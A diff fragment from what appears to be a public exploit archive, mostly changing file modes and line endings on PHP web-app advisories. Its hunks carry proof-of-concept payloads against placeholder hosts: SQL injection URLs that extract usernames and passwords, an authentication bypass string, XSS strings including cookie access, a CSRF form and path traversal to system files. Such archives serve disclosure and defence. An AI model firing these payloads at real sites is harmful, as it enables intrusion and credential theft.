-http://www.example.com/hpdiags/frontend2/help/search.php?query="onmouseover="alert(1); \ No newline at end of file +http://www.example.com/hpdiags/frontend2/help/search.php?query="onmouseover="alert(1); \ No newline at end of file diff --git a/platforms/php/webapps/35117.txt b/platforms/php/webapps/35117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35118.txt b/platforms/php/webapps/35118.txt old mode 100755 new mode 100644 index 58c882506..5a46d4d30 --- a/platforms/php/webapps/35118.txt +++ b/platforms/php/webapps/35118.txt @@ -4,4 +4,4 @@ phpRS is prone to an SQL-injection vulnerability because the application fails t A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/model-kits.php?akce=model&nazev=zis-3-1942-divisional-gun&id=-32/**/union/**/select/**/1,concat%28user,0x3a,password%29,3,4,5/**/from/**/mac_user-- \ No newline at end of file +http://www.example.com/model-kits.php?akce=model&nazev=zis-3-1942-divisional-gun&id=-32/**/union/**/select/**/1,concat%28user,0x3a,password%29,3,4,5/**/from/**/mac_user-- \ No newline at end of file diff --git a/platforms/php/webapps/3512.txt b/platforms/php/webapps/3512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35120.txt b/platforms/php/webapps/35120.txt old mode 100755 new mode 100644 index d06def8df..3366b6044 --- a/platforms/php/webapps/35120.txt +++ b/platforms/php/webapps/35120.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Radius Manager 3.6.0 is vulnerable; other versions may also be affected -http:///admin.php?cont=update_usergroup&id=1 POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=edit_usergroup&id=1 Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 120 name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update Request 2: http:///admin.php?cont=store_nas POST /admin.php?cont=store_nas HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=new_nas Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 112 name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS \ No newline at end of file +http:///admin.php?cont=update_usergroup&id=1 POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=edit_usergroup&id=1 Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 120 name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update Request 2: http:///admin.php?cont=store_nas POST /admin.php?cont=store_nas HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=new_nas Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 112 name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS \ No newline at end of file diff --git a/platforms/php/webapps/35121.txt b/platforms/php/webapps/35121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35122.txt b/platforms/php/webapps/35122.txt old mode 100755 new mode 100644 index f476152bd..c35653cb9 --- a/platforms/php/webapps/35122.txt +++ b/platforms/php/webapps/35122.txt @@ -4,4 +4,4 @@ Social Share is prone to an SQL-injection vulnerability because the application A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/socialshare/postview.php? postid=-1 union select 1,2,3,4,5,6,7,8,9,10# \ No newline at end of file +http://www.example.com/socialshare/postview.php? postid=-1 union select 1,2,3,4,5,6,7,8,9,10# \ No newline at end of file diff --git a/platforms/php/webapps/35123.txt b/platforms/php/webapps/35123.txt old mode 100755 new mode 100644 index e939f6910..d5d9c76bf --- a/platforms/php/webapps/35123.txt +++ b/platforms/php/webapps/35123.txt @@ -4,4 +4,4 @@ Mafya Oyun Scrpti is prone to an SQL-injection vulnerability because the applica A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/profil.php?id=[SQL] \ No newline at end of file +http://www.example.com/profil.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/35124.txt b/platforms/php/webapps/35124.txt old mode 100755 new mode 100644 index 8d153a074..21715cbe5 --- a/platforms/php/webapps/35124.txt +++ b/platforms/php/webapps/35124.txt @@ -9,4 +9,4 @@ FreeNAS 0.7.2.5543 is vulnerable; other versions may also be affected. http://www.example.com/quixplorer/index.php?action=list&order=name&srt=yes&lang=en%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E -http://www.example.com/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes \ No newline at end of file +http://www.example.com/quixplorer/index.php?action=list&order=nan%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Eme&srt=yes \ No newline at end of file diff --git a/platforms/php/webapps/35125.txt b/platforms/php/webapps/35125.txt old mode 100755 new mode 100644 index d5ae7e5a0..4712aaf1c --- a/platforms/php/webapps/35125.txt +++ b/platforms/php/webapps/35125.txt @@ -4,4 +4,4 @@ Openfiler is prone to a cross-site scripting vulnerability because it fails to s An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/admin/system.html?step=2&device=et%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Ebh0 \ No newline at end of file +http://www.example.com/admin/system.html?step=2&device=et%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3Ebh0 \ No newline at end of file diff --git a/platforms/php/webapps/35126.txt b/platforms/php/webapps/35126.txt old mode 100755 new mode 100644 index f7de482b9..43b3e06a1 --- a/platforms/php/webapps/35126.txt +++ b/platforms/php/webapps/35126.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Habari 0.6.5 is affected; other versions may be vulnerable as well. http://www.example.com/system/admin/dash_status.php?status_data[1]=<script>alert('XSS');</script> -http://www.example.com/system/admin/dash_additem.php?additem_form=<script>alert('XSS');</script> \ No newline at end of file +http://www.example.com/system/admin/dash_additem.php?additem_form=<script>alert('XSS');</script> \ No newline at end of file diff --git a/platforms/php/webapps/35129.txt b/platforms/php/webapps/35129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3513.php b/platforms/php/webapps/3513.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35131.txt b/platforms/php/webapps/35131.txt old mode 100755 new mode 100644 index 824774a09..2099fd88e --- a/platforms/php/webapps/35131.txt +++ b/platforms/php/webapps/35131.txt @@ -8,4 +8,4 @@ The following example input is available: Username: anytext' or verified=1# -Password: arbitrary_text \ No newline at end of file +Password: arbitrary_text \ No newline at end of file diff --git a/platforms/php/webapps/35133.txt b/platforms/php/webapps/35133.txt old mode 100755 new mode 100644 index c8f86902d..17ec5ca25 --- a/platforms/php/webapps/35133.txt +++ b/platforms/php/webapps/35133.txt @@ -13,4 +13,4 @@ http://www.example.com/show_image_NpAdvFeaThumb.php?cache=false&cat=1&filename=/ http://www.example.com/show_image_NpAdvSecondaryRight.php?cache=false&cat=1&filename=/../../../../../../etc/hosts http://www.example.com/show_image_NpAdvSideFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts http://www.example.com/show_image_NpAdvSinglePhoto.php?cache=false&cat=1&filename=/../../../../../../etc/hosts -http://www.example.com/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts \ No newline at end of file +http://www.example.com/show_image_NpAdvSubFea.php?cache=false&cat=1&filename=/../../../../../../etc/hosts \ No newline at end of file diff --git a/platforms/php/webapps/35134.txt b/platforms/php/webapps/35134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35135.txt b/platforms/php/webapps/35135.txt old mode 100755 new mode 100644 index 7a69a3663..25bd65558 --- a/platforms/php/webapps/35135.txt +++ b/platforms/php/webapps/35135.txt @@ -4,4 +4,4 @@ The Classified component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/classified-demo/index.php?option=com_classified&view=ads&name=[SQLi] \ No newline at end of file +http://www.example.com/classified-demo/index.php?option=com_classified&view=ads&name=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35136.txt b/platforms/php/webapps/35136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35137.txt b/platforms/php/webapps/35137.txt old mode 100755 new mode 100644 index 8aed50966..280c0a97f --- a/platforms/php/webapps/35137.txt +++ b/platforms/php/webapps/35137.txt @@ -10,4 +10,4 @@ Vulnerable code: $referrer = $_SERVER[HTTP_REFERER]; header("Location: $referrer HTTP query ("Referer" field): -Referer: http://www.example.com/\r\n[second new response] \ No newline at end of file +Referer: http://www.example.com/\r\n[second new response] \ No newline at end of file diff --git a/platforms/php/webapps/35138.txt b/platforms/php/webapps/35138.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35140.txt b/platforms/php/webapps/35140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35141.txt b/platforms/php/webapps/35141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35142.txt b/platforms/php/webapps/35142.txt old mode 100755 new mode 100644 index 4af33db7c..ed1f8a96c --- a/platforms/php/webapps/35142.txt +++ b/platforms/php/webapps/35142.txt @@ -4,4 +4,4 @@ Social Share is prone to a cross-site scripting vulnerability because it fails t An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/socialshare/search.php?search=<XSS> \ No newline at end of file +http://www.example.com/socialshare/search.php?search=<XSS> \ No newline at end of file diff --git a/platforms/php/webapps/35143.txt b/platforms/php/webapps/35143.txt old mode 100755 new mode 100644 index 857260727..ddf990560 --- a/platforms/php/webapps/35143.txt +++ b/platforms/php/webapps/35143.txt @@ -4,4 +4,4 @@ HotWeb Scripts HotWeb Rentals is prone to an SQL-injection vulnerability because A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users \ No newline at end of file +http://www.example.com/default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users \ No newline at end of file diff --git a/platforms/php/webapps/35145.txt b/platforms/php/webapps/35145.txt old mode 100755 new mode 100644 index 6cc8ff0f1..7c38bbd35 --- a/platforms/php/webapps/35145.txt +++ b/platforms/php/webapps/35145.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Pligg CMS 1.1.3 is vulnerable; other versions may also be affected. -http://www.example.com/cloud.php?range={SQL} \ No newline at end of file +http://www.example.com/cloud.php?range={SQL} \ No newline at end of file diff --git a/platforms/php/webapps/35146.txt b/platforms/php/webapps/35146.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35149.txt b/platforms/php/webapps/35149.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35150.php b/platforms/php/webapps/35150.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35155.txt b/platforms/php/webapps/35155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35156.txt b/platforms/php/webapps/35156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35157.html b/platforms/php/webapps/35157.html old mode 100755 new mode 100644 index 8daaca43f..3c61c3656 --- a/platforms/php/webapps/35157.html +++ b/platforms/php/webapps/35157.html @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Coppermine Photo Gallery 1.5.10 is vulnerable; other versions may also be affected. -<html><body><center> <form action="http://localhost/cpg.1.5.10/searchnew.php" method="post"> <input type="hidden" name="insert" value="1"> <input type="hidden" name="pics[]" value="222"> <input type="hidden" name="picfile_222" value="PGJvZHkgb25sb2FkPWFsZXJ0KDEyMyk7Pg"> <input type="submit" value="Test!"> </form> </center></body></html> \ No newline at end of file +<html><body><center> <form action="http://localhost/cpg.1.5.10/searchnew.php" method="post"> <input type="hidden" name="insert" value="1"> <input type="hidden" name="pics[]" value="222"> <input type="hidden" name="picfile_222" value="PGJvZHkgb25sb2FkPWFsZXJ0KDEyMyk7Pg"> <input type="submit" value="Test!"> </form> </center></body></html> \ No newline at end of file diff --git a/platforms/php/webapps/35159.txt b/platforms/php/webapps/35159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3516.php b/platforms/php/webapps/3516.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35160.txt b/platforms/php/webapps/35160.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35165.txt b/platforms/php/webapps/35165.txt old mode 100755 new mode 100644 index 8ad8ed2b3..8c6bcb6c7 --- a/platforms/php/webapps/35165.txt +++ b/platforms/php/webapps/35165.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce WikLink 0.1.3 is vulnerable; other versions may also be affected. -http://www.example.com/wiklink/getURL.php?id=-1' union select 1111/* \ No newline at end of file +http://www.example.com/wiklink/getURL.php?id=-1' union select 1111/* \ No newline at end of file diff --git a/platforms/php/webapps/35167.txt b/platforms/php/webapps/35167.txt old mode 100755 new mode 100644 index c1ee08de9..39e0b8e61 --- a/platforms/php/webapps/35167.txt +++ b/platforms/php/webapps/35167.txt @@ -4,4 +4,4 @@ The Joomla! Search component is prone to a cross-site-scripting vulnerability be An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/joomla1015/index.php?option=com_search&searchword=xss&searchphrase=any&ordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;% \ No newline at end of file +http://www.example.com/joomla1015/index.php?option=com_search&searchword=xss&searchphrase=any&ordering=newest%22%20onmousemove=alert%28document.cookie%29%20style=position:fixed;top:0;left:0;width:100%;height:100%;% \ No newline at end of file diff --git a/platforms/php/webapps/35172.txt b/platforms/php/webapps/35172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35185.txt b/platforms/php/webapps/35185.txt old mode 100755 new mode 100644 index 99ae63da9..37cb8229f --- a/platforms/php/webapps/35185.txt +++ b/platforms/php/webapps/35185.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WonderCMS 0.3.3 is vulnerable; prior versions may also be affected. -http://www.example.com/editText.php?fieldname=slogan&content=slogan<img src=x onerror=alert("XSS")> \ No newline at end of file +http://www.example.com/editText.php?fieldname=slogan&content=slogan<img src=x onerror=alert("XSS")> \ No newline at end of file diff --git a/platforms/php/webapps/35186.txt b/platforms/php/webapps/35186.txt old mode 100755 new mode 100644 index c07c87b20..cda631ead --- a/platforms/php/webapps/35186.txt +++ b/platforms/php/webapps/35186.txt @@ -7,4 +7,4 @@ A successful exploit could allow an attacker to compromise the application, acce WikLink 0.1.3 is vulnerable; other versions may also be affected. http://www.example.com/editCategory.php?action=edit&fold=9999'%20union%20select%201,2,3,4/* -http://www.example.com/editSite.php?action=edit&site=999'%20union%20select%201,2,3,4,5/* \ No newline at end of file +http://www.example.com/editSite.php?action=edit&site=999'%20union%20select%201,2,3,4,5/* \ No newline at end of file diff --git a/platforms/php/webapps/35187.txt b/platforms/php/webapps/35187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3519.txt b/platforms/php/webapps/3519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35191.txt b/platforms/php/webapps/35191.txt old mode 100755 new mode 100644 index 9451f6f19..a83e08375 --- a/platforms/php/webapps/35191.txt +++ b/platforms/php/webapps/35191.txt @@ -4,4 +4,4 @@ CMS Tovar is prone to an SQL-injection vulnerability because the application fai A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/tovar.php?id=-294+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())josalijoe,6,7,8,9-- \ No newline at end of file +http://www.example.com/tovar.php?id=-294+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user())josalijoe,6,7,8,9-- \ No newline at end of file diff --git a/platforms/php/webapps/35193.txt b/platforms/php/webapps/35193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35197.txt b/platforms/php/webapps/35197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35198.txt b/platforms/php/webapps/35198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35204.txt b/platforms/php/webapps/35204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35206.txt b/platforms/php/webapps/35206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35212.txt b/platforms/php/webapps/35212.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35218.txt b/platforms/php/webapps/35218.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35221.txt b/platforms/php/webapps/35221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35223.txt b/platforms/php/webapps/35223.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35224.txt b/platforms/php/webapps/35224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35227.txt b/platforms/php/webapps/35227.txt old mode 100755 new mode 100644 index 93913853c..00022b2f0 --- a/platforms/php/webapps/35227.txt +++ b/platforms/php/webapps/35227.txt @@ -12,4 +12,4 @@ POST /alguest/elimina.php HTTP/1.0 Host: website Cookie: admin=1 Content-Length: N -send=elimina&elimina=[SQL Injection] \ No newline at end of file +send=elimina&elimina=[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/35228.txt b/platforms/php/webapps/35228.txt old mode 100755 new mode 100644 index 4c40131df..7991de679 --- a/platforms/php/webapps/35228.txt +++ b/platforms/php/webapps/35228.txt @@ -7,4 +7,4 @@ Attacker-supplied script code may be executed in the context of the affected sit CompactCMS 1.4.1 is vulnerable; other versions may also be affected. http://www.example.com/afdrukken.php?page=">[XSS] -http://www.example.com/admin/includes/modules/permissions/permissions.Manage.php?status=notice&msg=[XSS] \ No newline at end of file +http://www.example.com/admin/includes/modules/permissions/permissions.Manage.php?status=notice&msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/35231.txt b/platforms/php/webapps/35231.txt old mode 100755 new mode 100644 index 1bc8bb5cf..799ff7fc2 --- a/platforms/php/webapps/35231.txt +++ b/platforms/php/webapps/35231.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access AWBS 2.9.2 is vulnerable; other versions may also be affected. -http://www.example.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)=' \ No newline at end of file +http://www.example.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)=' \ No newline at end of file diff --git a/platforms/php/webapps/35239.txt b/platforms/php/webapps/35239.txt old mode 100755 new mode 100644 index b6db916da..9dfbe83ba --- a/platforms/php/webapps/35239.txt +++ b/platforms/php/webapps/35239.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce PHPCMS 2008 V2 is vulnerable; other versions may also be affected. -http://www.example.com/path/data.php?action=get&where_time=-1+union+all+select+1,database()-- \ No newline at end of file +http://www.example.com/path/data.php?action=get&where_time=-1+union+all+select+1,database()-- \ No newline at end of file diff --git a/platforms/php/webapps/3524.txt b/platforms/php/webapps/3524.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35245.txt b/platforms/php/webapps/35245.txt old mode 100755 new mode 100644 index 70e773ea4..d682a0426 --- a/platforms/php/webapps/35245.txt +++ b/platforms/php/webapps/35245.txt @@ -4,4 +4,4 @@ PHPAuctions is prone to an SQL-injection vulnerability because the application f A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/viewfaqs.php?cat=2 and substring(version(),1,1)=5 \ No newline at end of file +http://www.example.com/viewfaqs.php?cat=2 and substring(version(),1,1)=5 \ No newline at end of file diff --git a/platforms/php/webapps/35251.txt b/platforms/php/webapps/35251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35253.txt b/platforms/php/webapps/35253.txt old mode 100755 new mode 100644 index 034185ba4..a76809f3d --- a/platforms/php/webapps/35253.txt +++ b/platforms/php/webapps/35253.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow web@all 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/weball/404.php?url=1%3Cscript%3Ealert%280%29%3C%2fscript%3E \ No newline at end of file +http://www.example.com/weball/404.php?url=1%3Cscript%3Ealert%280%29%3C%2fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/35254.txt b/platforms/php/webapps/35254.txt old mode 100755 new mode 100644 index 0fa998e30..29971ca30 --- a/platforms/php/webapps/35254.txt +++ b/platforms/php/webapps/35254.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PivotX 2.2.2 is vulnerable; other versions may also be affected. -http://www.example.com/pivotx/pivotx/modules/module_image.php?image=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/pivotx/pivotx/modules/module_image.php?image=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35255.txt b/platforms/php/webapps/35255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35257.txt b/platforms/php/webapps/35257.txt old mode 100755 new mode 100644 index 7e21b55e3..62aec9247 --- a/platforms/php/webapps/35257.txt +++ b/platforms/php/webapps/35257.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Videox7 UGC 2.5.3.2 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss] \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35258.txt b/platforms/php/webapps/35258.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35259.txt b/platforms/php/webapps/35259.txt old mode 100755 new mode 100644 index 61126a463..9aa9c26c8 --- a/platforms/php/webapps/35259.txt +++ b/platforms/php/webapps/35259.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br PivotX 2.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/includes/blogroll.php?id=1&color=123;}</style><script>alert("XSS");</script>| \ No newline at end of file +http://www.example.com/includes/blogroll.php?id=1&color=123;}</style><script>alert("XSS");</script>| \ No newline at end of file diff --git a/platforms/php/webapps/35260.txt b/platforms/php/webapps/35260.txt old mode 100755 new mode 100644 index 99f1b6c2e..d2878580f --- a/platforms/php/webapps/35260.txt +++ b/platforms/php/webapps/35260.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br PivotX 2.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/includes/timwrapper.php?src=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E \ No newline at end of file +http://www.example.com/includes/timwrapper.php?src=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35261.txt b/platforms/php/webapps/35261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35262.txt b/platforms/php/webapps/35262.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35263.txt b/platforms/php/webapps/35263.txt old mode 100755 new mode 100644 index 7ca729a6a..c4a9a27d4 --- a/platforms/php/webapps/35263.txt +++ b/platforms/php/webapps/35263.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to download arbitrary files from the affected WP Publication Archive 2.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/wp-publication-archive/includes/openfile.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../windows/win.ini \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/wp-publication-archive/includes/openfile.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../windows/win.ini \ No newline at end of file diff --git a/platforms/php/webapps/35264.txt b/platforms/php/webapps/35264.txt old mode 100755 new mode 100644 index f5939f0e7..e18483b6d --- a/platforms/php/webapps/35264.txt +++ b/platforms/php/webapps/35264.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Featured Content 0.0.1 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss] \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/x7host-videox7-ugc-plugin/x7listplayer.php?listid=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35265.php b/platforms/php/webapps/35265.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35266.txt b/platforms/php/webapps/35266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35271.txt b/platforms/php/webapps/35271.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35274.txt b/platforms/php/webapps/35274.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35277.txt b/platforms/php/webapps/35277.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35278.txt b/platforms/php/webapps/35278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35285.txt b/platforms/php/webapps/35285.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35286.txt b/platforms/php/webapps/35286.txt old mode 100755 new mode 100644 index a0d9e0283..75406dd6e --- a/platforms/php/webapps/35286.txt +++ b/platforms/php/webapps/35286.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow BezahlCode Generator Plugin 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/bezahlcode-generator/der_generator.php?gen_name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/bezahlcode-generator/der_generator.php?gen_name=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35287.txt b/platforms/php/webapps/35287.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35288.txt b/platforms/php/webapps/35288.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35289.txt b/platforms/php/webapps/35289.txt old mode 100755 new mode 100644 index 004732e28..1c63278b3 --- a/platforms/php/webapps/35289.txt +++ b/platforms/php/webapps/35289.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow FCChat Widget 2.1.7 is vulnerable; other versions may also be affected. -http://localhost/wordpress/wp-content/plugins/fcchat/js/import.config.php?path=[xss] \ No newline at end of file +http://localhost/wordpress/wp-content/plugins/fcchat/js/import.config.php?path=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35290.txt b/platforms/php/webapps/35290.txt old mode 100755 new mode 100644 index 2a2f9a6f2..2f0094e10 --- a/platforms/php/webapps/35290.txt +++ b/platforms/php/webapps/35290.txt @@ -10,4 +10,4 @@ 